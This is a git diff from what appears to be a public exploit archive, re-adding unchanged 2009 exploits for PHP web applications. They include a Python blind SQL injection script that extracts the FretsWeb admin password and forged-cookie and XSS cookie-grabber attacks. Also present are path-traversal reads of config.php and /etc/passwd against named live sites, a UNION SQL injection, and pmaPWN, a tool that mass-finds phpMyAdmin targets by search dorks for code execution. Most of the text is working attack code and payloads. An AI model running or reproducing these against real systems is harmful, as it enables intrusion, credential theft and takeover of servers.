Example: python "+filename+" 'www.example.com' 'demo' 'y3nh4ck3r'\n" - sys.exit() - -def brute_length(urlrequest): - #Username length - flag=1 - i=0 - while(flag==1): - i=i+1 - blindsql=urlrequest+"'+AND+(SELECT+length(value)+FROM+contest_config+WHERE+name='admin_password')="+str(i)+"%23" #injected code - output=request(blindsql) - if(re.search("Fretsweb - Player",output)): - flag=2 - else: - flag=1 - #This is the max length of username - if (i>50): - error() - #Save column length - length=i - print "\t<<<<<--------------------------------------------------------->>>>>\n" - print "\tLength catched!\n" - print "\tLength Username --> "+str(length)+"\n" - print "\tWait several minutes...\n" - print "\t<<<<<--------------------------------------------------------->>>>>\n\n" - return length - -def exploiting (lengthvalue,urlrequest): - #Bruteforcing values - values="" - k=1 - z=32 - while((k<=lengthvalue) and (z<=126)): - blindsql=urlrequest+"'+AND+ascii(substring((SELECT+value+FROM+contest_config+WHERE+name='admin_password'),"+str(k)+",1))="+str(z)+"%23" #injected code - output=request(blindsql) - if(re.search("Fretsweb - Player",output)): - values=values+chr(z) - k=k+1 - z=32 -#new char - z=z+1 - return values -#Main -init() -#Init variables -if(len(sys.argv) <= 3): - helper(sys.argv[0]) - -host=sys.argv[1] -path=sys.argv[2] -nameforfish=sys.argv[3] -finalrequest="http://"+host+"/"+path+"/player.php?name="+nameforfish -testblind1=finalrequest+"'+AND+1=1%23" #Return true -outcode1=request(testblind1) -testblind2=finalrequest+"'+AND+1=0%23" #Return false -outcode2=request(testblind2) -#Check BSQLi -if(outcode1==outcode2): - error() -else: - testedblindsql() -#Catching length of admin password -lengthadmin=brute_length(finalrequest) -#Catching value of password (not hashed) -passwordadmin=exploiting(lengthadmin,finalrequest) -print "\n\t\t*************************************************\n" -print "\t\t********* EXPLOIT EXECUTED SUCCESSFULLY ********\n" -print 
"\t\t*************************************************\n\n" -print "\t\tAdmin-password: "+passwordadmin+"\n\n" -print "\n\t\t<<----------------------FINISH!-------------------->>\n\n" -print "\t\t<<---------------Thanks to: y3nh4ck3r-------------->>\n\n" -print "\t\t<<------------------------EOF---------------------->>\n\n" -#Check all arguments - -# milw0rm.com [2009-06-17] +#!/usr/bin/python +#*********************************************************************************************** +#*********************************************************************************************** +#** ** +#** ** +#** [] [] [] [][][][> [] [] [][ ][] [] [][]] [] [> [][][][> [][][][] ** +#** || || || [] [][] [] [] [] [] [] [] [] [] [] [] ** +# [> [][][][] [][][][> [] [] [] [] [] [][] [] [][] [][][][> [] [] ** +#** [-----[]-----[][][][>--[]--[]-[]---[][][]--[]-[]--[]--------[]-----[][][][>--[][][][]---\ +#**==[> [] [] [] [][] [] [] [][][] [] [][] [] [] [] >>-- +#** [----[[]]----[]--- ----[]-----[]---[]--[]-----[]--[]-------[] []---[]----------[]--[]---/ +# [> [[[]]] [][][][> [][] [] [][[] [[]] [][] [][][] [] [> [][][][> <][] [] +#** ** +#** ** +#** VIVA SPAIN!... GANAREMOS EL MUNDIAL!...o.O ** +#** PROUD TO BE SPANISH! 
** +#** ** +#*********************************************************************************************** +#*********************************************************************************************** +# +#--------------------------------------------------------------------------------------------- +#| (GET var 'name') BLIND SQL INJECTION EXPLOIT | +#|-------------------------------------------------------------------------------------------| +#| | FretsWeb 1.2 | | +#| CMS INFORMATION: ------------------------ | +#| | +#|-->WEB: http://sourceforge.net/projects/fretsweb/ | +#|-->DOWNLOAD: http://sourceforge.net/projects/fretsweb/ | +#|-->DEMO: N/A | +#|-->CATEGORY: CMS / Games/Entertainment | +#|-->DESCRIPTION: Fretsweb is a Contest or Chart Server for Frets on Fire. It... | +#| is an improved version of FoFCS.It is meant for... | +#|-->RELEASED: 2009-05-30 | +#| | +#| CMS VULNERABILITY: | +#| | +#|-->TESTED ON: firefox 3 | +#|-->DORK: N/A | +#|-->CATEGORY: BLIND SQLi PYTHON EXPLOIT | +#|-->AFFECT VERSION: CURRENT (MAYBE <= ?) | +#|-->Discovered Bug date: 2009-06-02 | +#|-->Reported Bug date: 2009-06-02 | +#|-->Fixed bug date: 2009-06-14 | +#|-->Info patch: http://sourceforge.net/projects/fretsweb/ | +#|-->Author: YEnH4ckEr | +#|-->mail: y3nh4ck3r[at]gmail[dot]com | +#|-->WEB/BLOG: N/A | +#|-->COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo. | +#|-->EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!) 
|
+#---------------------------------------------------------------------------------------------
+#
+#------------
+#CONDITIONS:
+#------------
+#
+#magic quotes=OFF
+#
+#-------
+#NEED:
+#-------
+#
+#Valid name
+#
+#---------------------------------------
+#PROOF OF CONCEPT (SQL INJECTION):
+#---------------------------------------
+#
+#http://[HOST]/[PATH]/player.php?name=[valid_name]'+and+1=1%23 --> TRUE
+#http://[HOST]/[PATH]/player.php?name=[valid_name]'+AND+1=0%23 --> FALSE
+#
+#
+#http://[HOST]/[PATH]/song.php?hash=[valid_song]'+and+1=1%23 --> TRUE
+#http://[HOST]/[PATH]/song.php?hash=[valid_song]'+and+1=0%23 --> FALSE
+#
+#--------------
+#WATCH VIDEOS
+#--------------
+#
+# BSQLi --> http://www.youtube.com/watch?v=BYrkuAN2ggI
+#
+# LFI --> http://www.youtube.com/watch?v=LZ8cG_sIHow
+#
+#
+##############################################################################
+##############################################################################
+##**************************************************************************##
+## SPECIAL THANKS TO: Str0ke and every H4ck3r(all who do milw0rm)!
##
+##**************************************************************************##
+##--------------------------------------------------------------------------##
+##**************************************************************************##
+## GREETZ TO: JosS, Ulises2k, J.McCray, Evil1 and Spanish Hack3Rs community!##
+##**************************************************************************##
+##############################################################################
+##############################################################################
+#
+#Used modules
+import urllib,sys,re,os
+#Defined functions
+def init():
+ if(sys.platform=='win32'):
+ os.system("cls")
+ os.system ("title FretsWeb 1.2 Blind SQL Injection Exploit")
+ os.system ("color 02")
+ else:
+ os.sytem("clear")
+ print "\t#######################################################\n\n"
+ print "\t#######################################################\n\n"
+ print "\t## FretsWeb 1.2 Blind SQL Injection Exploit ##\n\n"
+ print "\t## ++Conditions: magic_quotes=OFF ##\n\n"
+ print "\t## ++Needed: Valid name ##\n\n"
+ print "\t## Author: Y3nh4ck3r ##\n\n"
+ print "\t## Contact:y3nh4ck3r[at]gmail[dot]com ##\n\n"
+ print "\t## Proud to be Spanish!
##\n\n"
+ print "\t#######################################################\n\n"
+ print "\t#######################################################\n\n"
+
+def request(urltarget):
+ conn=urllib.urlopen(urltarget)
+ outcode=conn.read()
+ #print outcode #--> Active this line for debugger mode
+ return outcode
+
+def error():
+ print "\t------------------------------------------------------------\n"
+ print "\tWeb isn't vulnerable!\n\n"
+ print "\t--->Maybe:\n\n"
+ print "\t\t1.-Patched.\n"
+ print "\t\t2.-Bad path or host.\n"
+ print "\t\t3.-Bad name.\n"
+ print "\t\t4.-Magic quotes ON.\n"
+ print "\t\tEXPLOIT FAILED!\n"
+ print "\t------------------------------------------------------------\n"
+ sys.exit()
+
+def testedblindsql():
+ print "\t-----------------------------------------------------------------\n"
+ print "\tWEB MAYBE BE VULNERABLE!\n\n"
+ print "\tTested Blind SQL Injection.\n"
+ print "\tStarting exploit...\n"
+ print "\t-----------------------------------------------------------------\n\n"
+
+def helper(filename):
+ print "\n\t[!!!] FretsWeb 1.2 Blind SQL Injection Exploit\n"
+ print "\t[!!!] USAGE MODE: [!!!]\n"
+ print "\t[!!!] python "+filename+" [HOST] [PATH] [NAME]\n"
+ print "\t[!!!] [HOST]: Web.\n"
+ print "\t[!!!] [PATH]: Home Path.\n"
+ print "\t[!!!] [NAME]: Name for fish\n"
+ print "\t[!!!]
Example: python "+filename+" 'www.example.com' 'demo' 'y3nh4ck3r'\n"
+ sys.exit()
+
+def brute_length(urlrequest):
+ #Username length
+ flag=1
+ i=0
+ while(flag==1):
+ i=i+1
+ blindsql=urlrequest+"'+AND+(SELECT+length(value)+FROM+contest_config+WHERE+name='admin_password')="+str(i)+"%23" #injected code
+ output=request(blindsql)
+ if(re.search("Fretsweb - Player",output)):
+ flag=2
+ else:
+ flag=1
+ #This is the max length of username
+ if (i>50):
+ error()
+ #Save column length
+ length=i
+ print "\t<<<<<--------------------------------------------------------->>>>>\n"
+ print "\tLength catched!\n"
+ print "\tLength Username --> "+str(length)+"\n"
+ print "\tWait several minutes...\n"
+ print "\t<<<<<--------------------------------------------------------->>>>>\n\n"
+ return length
+
+def exploiting (lengthvalue,urlrequest):
+ #Bruteforcing values
+ values=""
+ k=1
+ z=32
+ while((k<=lengthvalue) and (z<=126)):
+ blindsql=urlrequest+"'+AND+ascii(substring((SELECT+value+FROM+contest_config+WHERE+name='admin_password'),"+str(k)+",1))="+str(z)+"%23" #injected code
+ output=request(blindsql)
+ if(re.search("Fretsweb - Player",output)):
+ values=values+chr(z)
+ k=k+1
+ z=32
+#new char
+ z=z+1
+ return values
+#Main
+init()
+#Init variables
+if(len(sys.argv) <= 3):
+ helper(sys.argv[0])
+
+host=sys.argv[1]
+path=sys.argv[2]
+nameforfish=sys.argv[3]
+finalrequest="http://"+host+"/"+path+"/player.php?name="+nameforfish
+testblind1=finalrequest+"'+AND+1=1%23" #Return true
+outcode1=request(testblind1)
+testblind2=finalrequest+"'+AND+1=0%23" #Return false
+outcode2=request(testblind2)
+#Check BSQLi
+if(outcode1==outcode2):
+ error()
+else:
+ testedblindsql()
+#Catching length of admin password
+lengthadmin=brute_length(finalrequest)
+#Catching value of password (not hashed)
+passwordadmin=exploiting(lengthadmin,finalrequest)
+print "\n\t\t*************************************************\n"
+print "\t\t********* EXPLOIT EXECUTED SUCCESSFULLY ********\n"
+print
"\t\t*************************************************\n\n"
+print "\t\tAdmin-password: "+passwordadmin+"\n\n"
+print "\n\t\t<<----------------------FINISH!-------------------->>\n\n"
+print "\t\t<<---------------Thanks to: y3nh4ck3r-------------->>\n\n"
+print "\t\t<<------------------------EOF---------------------->>\n\n"
+#Check all arguments
+
+# milw0rm.com [2009-06-17]
diff --git a/platforms/php/webapps/8981.txt b/platforms/php/webapps/8981.txt
index cbd33a555..56af1e917 100755
--- a/platforms/php/webapps/8981.txt
+++ b/platforms/php/webapps/8981.txt
@@ -1,21 +1,21 @@
-########################################################
-PhpPortal v1 Insecure Cookie Handling Vulnerability
-########################################################
-
-Author : KnocKout
-Special Thankz : CW All users
-Script : http://phportal.mertindualari.com
-
-########################################################
-
-Exploit;
-
-javascript:document.cookie="kulladi=[Username];path=/";
-Enter..
-
-Go To; http://target.com/uye_paneli.php?islem=bilgilerim
-
-
-########################################################
-
-# milw0rm.com [2009-06-17]
+########################################################
+PhpPortal v1 Insecure Cookie Handling Vulnerability
+########################################################
+
+Author : KnocKout
+Special Thankz : CW All users
+Script : http://phportal.mertindualari.com
+
+########################################################
+
+Exploit;
+
+javascript:document.cookie="kulladi=[Username];path=/";
+Enter..
+
+Go To; http://target.com/uye_paneli.php?islem=bilgilerim
+
+
+########################################################
+
+# milw0rm.com [2009-06-17]
diff --git a/platforms/php/webapps/8984.txt b/platforms/php/webapps/8984.txt
index 2b7b8ac0d..b707384c6 100755
--- a/platforms/php/webapps/8984.txt
+++ b/platforms/php/webapps/8984.txt
@@ -1,67 +1,67 @@ -################################################################################################################# -[+] CMS Buzz (xss/Change Password)Multiple Remote Vulnerabilities -[+] Discovered By ThE g0bL!N -[+] Vendor:cmsbuzz.com -[+] Note : If you are The S3r!0uS I say To Fuck you Because You are Hacked Site Of My Best Friends dz-boys.com -[+] Demo:http://demo.cmsbuzz.com/ -[+] Greeting : All my freinds ( Dz ) -################################################################################################################# -Remote Changing Password: -+++++++++++++++++++++++++ -1) You Must Register In ThE site http://www.victim.com/?action=register -2) Login -3) Go To url: - http:///www.victim.com/?action=profile&user= [ Name Of user ] -Example -http:///www.victim.com/?action=profile&user=admin -Change admin Password Then go To login http://path/?action=login -Cross Site Scritping -++++++++++++++++++++ -http://www.victim.com/?action=search - - -################################################################################################################# -[+] CMS Buzz Cookie Grabber Exploit& HTML Injection -[+] Discovered By ThE g0bL!N -[+] Vendor:http://msbuzz.com/ -[+] Fuck You The S3r!0uS -################################################################################################################# -PoC --- -[+] Make 2 files and upload to your host : -[+]cookie.php - > Put in this File That Code: - -[+]log.txt - > CHMOD it 777 and put in the same directory with cookie.php - -[+]Exploit: - ------- -1) Register in The SIte -2) Go to send message http://path/?action=compose -3)We Put in - To:admin name - Subject: Some Subject - Message: - The js code Worked When The admin Read The Message -+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ -2) HTML Injection -+++++++++++++++++ -1) Register :p -2) Go to send message http://path/?action=compose -3)We Put in - To:admin name - 
Subject: Some Subject - Message: 1)XSS:PoC : - --------- - 2)Poc: Iframe :"> - ------------- - 3)PoC : Redirection:">"">>>> "" - ------------------- - DEMO:http://demo.cmsbuzz.com -################################################################################################################ - -# milw0rm.com [2009-06-18] +################################################################################################################# +[+] CMS Buzz (xss/Change Password)Multiple Remote Vulnerabilities +[+] Discovered By ThE g0bL!N +[+] Vendor:cmsbuzz.com +[+] Note : If you are The S3r!0uS I say To Fuck you Because You are Hacked Site Of My Best Friends dz-boys.com +[+] Demo:http://demo.cmsbuzz.com/ +[+] Greeting : All my freinds ( Dz ) +################################################################################################################# +Remote Changing Password: ++++++++++++++++++++++++++ +1) You Must Register In ThE site http://www.victim.com/?action=register +2) Login +3) Go To url: + http:///www.victim.com/?action=profile&user= [ Name Of user ] +Example +http:///www.victim.com/?action=profile&user=admin +Change admin Password Then go To login http://path/?action=login +Cross Site Scritping +++++++++++++++++++++ +http://www.victim.com/?action=search + + +################################################################################################################# +[+] CMS Buzz Cookie Grabber Exploit& HTML Injection +[+] Discovered By ThE g0bL!N +[+] Vendor:http://msbuzz.com/ +[+] Fuck You The S3r!0uS +################################################################################################################# +PoC +-- +[+] Make 2 files and upload to your host : +[+]cookie.php - > Put in this File That Code: + +[+]log.txt - > CHMOD it 777 and put in the same directory with cookie.php + +[+]Exploit: + ------- +1) Register in The SIte +2) Go to send message http://path/?action=compose +3)We Put in + To:admin name + Subject: Some Subject + Message: 
+ The js code Worked When The admin Read The Message ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +2) HTML Injection ++++++++++++++++++ +1) Register :p +2) Go to send message http://path/?action=compose +3)We Put in + To:admin name + Subject: Some Subject + Message: 1)XSS:PoC : + --------- + 2)Poc: Iframe :"> + ------------- + 3)PoC : Redirection:">"">>>> "" + ------------------- + DEMO:http://demo.cmsbuzz.com +################################################################################################################ + +# milw0rm.com [2009-06-18] diff --git a/platforms/php/webapps/8988.txt b/platforms/php/webapps/8988.txt index c7140f977..6992537a3 100755 --- a/platforms/php/webapps/8988.txt +++ b/platforms/php/webapps/8988.txt 
@@ -1,144 +1,144 @@
- || || | ||
- o_,_7 _|| . _o_7 _|| q_|_|| o_\\\_,
- ( : / (_) / ( .
-
- ___________________
- _/QQQQQQQQQQQQQQQQQQQ\__
- __/QQQ/````````````````\QQQ\___
- _/QQQQQ/ \QQQQQQ\
- /QQQQ/`` ```QQQQ\
- /QQQQ/ Advisory \QQQQ\
- |QQQQ/ By Qabandi \QQQQ|
- |QQQQ| |QQQQ|
- |QQQQ| From Kuwait, PEACE... |QQQQ|
- |QQQQ| |QQQQ|
- |QQQQ\ iqa[a]hotmail.fr /QQQQ|
- \QQQQ\ __ /QQQQ/
- \QQQQ\ /QQ\_QQQQ/
- \QQQQ\ \QQQQQQQ/
- \QQQQQ\ /QQQQQ/_
- ``\QQQQQ\_____________/QQQ/\QQQQ\_
- ``\QQQQQQQQQQQQQQQQQQQ/ `\QQQQ\
- ``````````````````` `````
-
-=Vuln: pc4arb - pc4 Uploader <= 10.0 Remote File Disclosure Vulnerability
-=INFO: http://pc4arb.com/article-48.html
-=BUY: ~~~
-=Download: ~~~
-=DORK: intext:"Pictures of Whale Penis"
-
- ____________
- _-=/:Conditions:\=-_
-````````````````````````````````````````````````````````````````````````````````
-
-none
-
----------------------------------------===--------------------------------------
-
- _________________
- _-=/:Vulnerable_Code:\=-_
-````````````````````````````````````````````````````````````````````````````````
-// in "./pc4uploader/upfiles/index.php"
-
-function displayimage( $fn, $lastMod, $fs )
-{
- global $out_Types;
- $ext = explode( ".", $fn );
- $ext_i = count( $ext ) - 1;
- $file_ext = $ext[$ext_i];
- header( "Last-Modified: ".$lastMod );
- header( "ETag: ".getetag( $fn ) );
- header( "Accept-Ranges: bytes" );
- header( "Content-Length: ".$fs );
- header( "Content-Type: ".$out_Types[$file_ext] );
- $fp = fopen( $fn, "rb" ); <-----------------------------//opens $fn with no filtering or precautions taken
- if ( function_exists( fpassthru ) )
- {
- fpassthru( $fp );
- }
- else
- {
- $temp = fread( $fp, $fs );
- echo $temp;
- }
- fclose( $fp );
- return;
-}
-
-// Function displayimage() is later called
-
-$file = $_GET['file']; <---------------------------------// again, not filtered or anything.
-//..
-//..
-//..
-//..
- displayimage( $file, "Thu, 01 Jan 2006 12:00:00 GMT", $fs );
-
----------------------------------------===--------------------------------------
-
- _______
- _-=/:P.o.C:\=-_
-````````````````````````````````````````````````````````````````````````````````
-
-http://localhost/pc4uploader/upfiles/index.php?file=../config.php
-http://localhost/pc4uploader/upfiles/index.php?file=/etc/passwd
-
-demo:
-
-http://upload.traidnt.net/upfiles/index.php?file=../config.php
-{Save File to view the code if needed}
-
-http://uploader.pc4arb.com/upfiles/index.php?file=../config.php
-{view source}
-
-
-
----------------------------------------===--------------------------------------
-
- __________
- _-=/:SOLUTION:\=-_
-````````````````````````````````````````````````````````````````````````````````
-
-//Use this displayimage() function instead, notice the changes..
-
-function displayimage( $fn, $lastMod, $fs )
-{
- global $out_Types;
- $fn = basename($fn);
- $ext = explode( ".", $fn );
- $ext_i = count( $ext ) - 1;
- $file_ext = $ext[$ext_i];
- header( "Last-Modified: ".$lastMod );
- header( "ETag: ".getetag( $fn ) );
- header( "Accept-Ranges: bytes" );
- header( "Content-Length: ".$fs );
- header( "Content-Type: ".$out_Types[$file_ext] );
- $fp = fopen( $fn, "rb" );
- if ( function_exists( fpassthru ) )
- {
- fpassthru( $fp );
- }
- else
- {
- $temp = fread( $fp, $fs );
- echo $temp;
- }
- fclose( $fp );
- return;
-}
-
-//I added $fn = basename($fn);, it will convert anything like "../../config.php" to "config.php"
-// since config.php doesent exist the script will do the rest by giving a safe error,
-// also move ./include/default.gif to ./upfiles/default.gif
-// everything should be good :)
-
----------------------------------------===--------------------------------------
- ______________________________________________________________________________
-/ \
-| Tem al-tableegh 3an el-thaghra min sinat yaddi |
-\______________________________________________________________________________/
- \ No More Private /
- `````````````````
- Salamz to All Muslim Hackers.
-
-# milw0rm.com [2009-06-22]
+ || || | ||
+ o_,_7 _|| . _o_7 _|| q_|_|| o_\\\_,
+ ( : / (_) / ( .
+
+ ___________________
+ _/QQQQQQQQQQQQQQQQQQQ\__
+ __/QQQ/````````````````\QQQ\___
+ _/QQQQQ/ \QQQQQQ\
+ /QQQQ/`` ```QQQQ\
+ /QQQQ/ Advisory \QQQQ\
+ |QQQQ/ By Qabandi \QQQQ|
+ |QQQQ| |QQQQ|
+ |QQQQ| From Kuwait, PEACE... |QQQQ|
+ |QQQQ| |QQQQ|
+ |QQQQ\ iqa[a]hotmail.fr /QQQQ|
+ \QQQQ\ __ /QQQQ/
+ \QQQQ\ /QQ\_QQQQ/
+ \QQQQ\ \QQQQQQQ/
+ \QQQQQ\ /QQQQQ/_
+ ``\QQQQQ\_____________/QQQ/\QQQQ\_
+ ``\QQQQQQQQQQQQQQQQQQQ/ `\QQQQ\
+ ``````````````````` `````
+
+=Vuln: pc4arb - pc4 Uploader <= 10.0 Remote File Disclosure Vulnerability
+=INFO: http://pc4arb.com/article-48.html
+=BUY: ~~~
+=Download: ~~~
+=DORK: intext:"Pictures of Whale Penis"
+
+ ____________
+ _-=/:Conditions:\=-_
+````````````````````````````````````````````````````````````````````````````````
+
+none
+
+---------------------------------------===--------------------------------------
+
+ _________________
+ _-=/:Vulnerable_Code:\=-_
+````````````````````````````````````````````````````````````````````````````````
+// in "./pc4uploader/upfiles/index.php"
+
+function displayimage( $fn, $lastMod, $fs )
+{
+ global $out_Types;
+ $ext = explode( ".", $fn );
+ $ext_i = count( $ext ) - 1;
+ $file_ext = $ext[$ext_i];
+ header( "Last-Modified: ".$lastMod );
+ header( "ETag: ".getetag( $fn ) );
+ header( "Accept-Ranges: bytes" );
+ header( "Content-Length: ".$fs );
+ header( "Content-Type: ".$out_Types[$file_ext] );
+ $fp = fopen( $fn, "rb" ); <-----------------------------//opens $fn with no filtering or precautions taken
+ if ( function_exists( fpassthru ) )
+ {
+ fpassthru( $fp );
+ }
+ else
+ {
+ $temp = fread( $fp, $fs );
+ echo $temp;
+ }
+ fclose( $fp );
+ return;
+}
+
+// Function displayimage() is later called
+
+$file = $_GET['file'];
<---------------------------------// again, not filtered or anything.
+//..
+//..
+//..
+//..
+ displayimage( $file, "Thu, 01 Jan 2006 12:00:00 GMT", $fs );
+
+---------------------------------------===--------------------------------------
+
+ _______
+ _-=/:P.o.C:\=-_
+````````````````````````````````````````````````````````````````````````````````
+
+http://localhost/pc4uploader/upfiles/index.php?file=../config.php
+http://localhost/pc4uploader/upfiles/index.php?file=/etc/passwd
+
+demo:
+
+http://upload.traidnt.net/upfiles/index.php?file=../config.php
+{Save File to view the code if needed}
+
+http://uploader.pc4arb.com/upfiles/index.php?file=../config.php
+{view source}
+
+
+
+---------------------------------------===--------------------------------------
+
+ __________
+ _-=/:SOLUTION:\=-_
+````````````````````````````````````````````````````````````````````````````````
+
+//Use this displayimage() function instead, notice the changes..
+
+function displayimage( $fn, $lastMod, $fs )
+{
+ global $out_Types;
+ $fn = basename($fn);
+ $ext = explode( ".", $fn );
+ $ext_i = count( $ext ) - 1;
+ $file_ext = $ext[$ext_i];
+ header( "Last-Modified: ".$lastMod );
+ header( "ETag: ".getetag( $fn ) );
+ header( "Accept-Ranges: bytes" );
+ header( "Content-Length: ".$fs );
+ header( "Content-Type: ".$out_Types[$file_ext] );
+ $fp = fopen( $fn, "rb" );
+ if ( function_exists( fpassthru ) )
+ {
+ fpassthru( $fp );
+ }
+ else
+ {
+ $temp = fread( $fp, $fs );
+ echo $temp;
+ }
+ fclose( $fp );
+ return;
+}
+
+//I added $fn = basename($fn);, it will convert anything like "../../config.php" to "config.php"
+// since config.php doesent exist the script will do the rest by giving a safe error,
+// also move ./include/default.gif to ./upfiles/default.gif
+// everything should be good :)
+
+---------------------------------------===--------------------------------------
+ ______________________________________________________________________________
+/ \
+| Tem al-tableegh 3an
el-thaghra min sinat yaddi |
+\______________________________________________________________________________/
+ \ No More Private /
+ `````````````````
+ Salamz to All Muslim Hackers.
+
+# milw0rm.com [2009-06-22]
diff --git a/platforms/php/webapps/8990.txt b/platforms/php/webapps/8990.txt
index 12697a8ea..ae61e4f98 100755
--- a/platforms/php/webapps/8990.txt
+++ b/platforms/php/webapps/8990.txt
@@ -1,24 +1,24 @@
-###################################################################
-###################################################################
-phpDatingClub v 3.7(ansubdepartments_id) SQL/XSS Injection Vulnerability
-Note: Algeria 2-0 Zambia
-###################################################################
-Founder : ThE g0bL!N
-Home:WwW.Snakespc.CoM
-More info:http://www.w2b.ru/webapp.php?cat=phpDatingClub
-###################################################################
-###################################################################
-SQL Injection Vulnerability
-###################################################################
-Exploit
-###################################################################
-Http://www.site.com/phpDatingClub/search.php?mode=day&sform%5Bday%5D=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44--
-Xss
-website.php?page=%3Cscript%3Ealert(0)%3C/script%3E
-Demo
-----
-http://www.w2b.ru/demo/phpDatingClub/
-######################################################################
-Greeting : Super_Ctistal (My Master) And all Muslims&algerian Hackers
-
-# milw0rm.com [2009-06-22]
+###################################################################
+###################################################################
+phpDatingClub v 3.7(ansubdepartments_id) SQL/XSS Injection Vulnerability
+Note: Algeria 2-0 Zambia
+###################################################################
+Founder : ThE g0bL!N
+Home:WwW.Snakespc.CoM
+More info:http://www.w2b.ru/webapp.php?cat=phpDatingClub
+###################################################################
+###################################################################
+SQL Injection Vulnerability
+###################################################################
+Exploit
+###################################################################
+Http://www.site.com/phpDatingClub/search.php?mode=day&sform%5Bday%5D=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44--
+Xss
+website.php?page=%3Cscript%3Ealert(0)%3C/script%3E
+Demo
+----
+http://www.w2b.ru/demo/phpDatingClub/
+######################################################################
+Greeting : Super_Ctistal (My Master) And all Muslims&algerian Hackers
+
+# milw0rm.com [2009-06-22]
diff --git a/platforms/php/webapps/8992.php b/platforms/php/webapps/8992.php
index a2b4a2fef..7f7511439 100755
--- a/platforms/php/webapps/8992.php
+++ b/platforms/php/webapps/8992.php
@@ -1,305 +1,305 @@ - 1) { - print "|****************************************************************|\n"; - print " pmaPWN.php - d3ck4, hacking.expose@gmail.com\n"; - print " phpMyAdmin Code Injection RCE Scanner & Exploit\n"; - print " This is PHP version original http://milw0rm.com/exploits/8921\n"; - print " credit: Greg Ose, pagvac @ gnucitizen.org\n"; - print " greetz: Hacking Expose!, HM Security, darkc0de\n"; - print "|****************************************************************|\n"; - print "\n"; - print "Usage: php $argv[0] \n"; - exit; -} - - print "|****************************************************************|\n"; - print " pmaPWN.php - d3ck4, hacking.expose@gmail.com\n"; - print " phpMyAdmin Code Injection RCE Scanner & Exploit\n"; - print " This is PHP version original http://milw0rm.com/exploits/8921\n"; - print " credit: Greg Ose, pagvac @ gnucitizen.org\n"; - print " greetz: Hacking Expose!, HM Security, darkc0de\n"; - print "|****************************************************************|\n"; - print "\n"; - $Handlex = FOpen("pmaPWN.log", "a+"); - FWrite($Handlex, "|****************************************************************|\n"); - FWrite($Handlex, " pmaPWN.php - d3ck4, hacking.expose@gmail.com\n"); - FWrite($Handlex, " phpMyAdmin Code Injection RCE Scanner & Exploit\n"); - FWrite($Handlex, " This is PHP version original http://milw0rm.com/exploits/8921\n"); - FWrite($Handlex, " credit: Greg Ose, pagvac @ gnucitizen.org\n"); - FWrite($Handlex, " greetz: Hacking Expose!, HM Security, darkc0de\n"); - FWrite($Handlex, "|****************************************************************|\n\n"); - print "[-] Master, where you want to go today? \n"; - print "[-] example dork: intitle:phpMyAdmin \n"; - fwrite(STDOUT, "\n[ pwn3r@google ~] ./dork -s "); - $dork = trim(fgets(STDIN)); - print "\n[!] QUERY: SELECT * FROM `googledb` WHERE `keyword` = '$dork'\n"; - FWrite($Handlex, "[!] 
QUERY: SELECT * FROM `googledb` WHERE `keyword` = '$dork'\n"); - for($i = 0; $i <= 900; $i+=100) { - $ch = curl_init(); - curl_setopt($ch, CURLOPT_URL, "http://www.google.com/cse?cx=013269018370076798483%3Awdba3dlnxqm&q=$dork&num=100&hl=en&as_qdr=all&start=$i&sa=N"); - curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); - curl_setopt($ch, CURLOPT_TIMEOUT, 200); - curl_setopt($ch, CURLOPT_HEADER, 1); - curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); - curl_setopt($ch, CURLOPT_REFERER, "http://google.com"); - curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.9) Gecko/20071025 Firefox/2.0.0.9'); - $pg = curl_exec($ch); - curl_close($ch); - - if (preg_match_all("/

    /", $pg, $links)) { $res[] = $links[2]; } - } - - foreach($res as $key) { - foreach($key as $target) { - $total++; - } - } - print "[+] Done. $total rows return.\n"; - FWrite($Handlex, "[+] Done. $total rows return.\n"); - FClose($Handlex); - foreach($res as $key) { - foreach($key as $target) { - $Handlex = FOpen("pmaPWN.log", "a+"); - $real = parse_url($target); - $url = "http://".$real['host']; - print "\n[-] Scanning phpMyAdmin on ".$url."\n"; - FWrite($Handlex, "\n[-] Scanning phpMyAdmin on ".$url."\n"); - FClose($Handlex); - sleep(5); - $curlHandle = curl_multi_init(); - for ($i = 0;$i < count($list); $i++) - $curl[$i] = addHandle($curlHandle,$url.$list[$i]); - ExecHandle($curlHandle); - for ($i = 0;$i < count($list); $i++) - { - $text[$i] = curl_multi_getcontent ($curl[$i]); - //echo $url.$list[$i]."\n"; - $Handlex = FOpen("pmaPWN.log", "a+"); - if (preg_match("/phpMyAdmin/", $text[$i]) or preg_match("/<title>Access denied/", $text[$i]) and preg_match("/phpMyAdmin/", $text[$i])) { - print "\n[!] w00t! w00t! Found phpMyAdmin [ ".$url.$list[$i]." ]"; - print "\n[+] Testing vulnerable, wait sec..\n"; - FWrite($Handlex, "\n[!] w00t! w00t! Found phpMyAdmin [ ".$url.$list[$i]." ]"); - FWrite($Handlex, "\n[+] Testing vulnerable, wait sec..\n"); - if (preg_match("/phpMyAdmin is more friendly with a/", $text[$i])) { - print "\n[!] w00t! w00t! NO PASSWD --> [ ".$url.$list[$i]." ]\n"; - FWrite($Handlex, "\n[!] w00t! w00t! NO PASSWD --> [ ".$url.$list[$i]." 
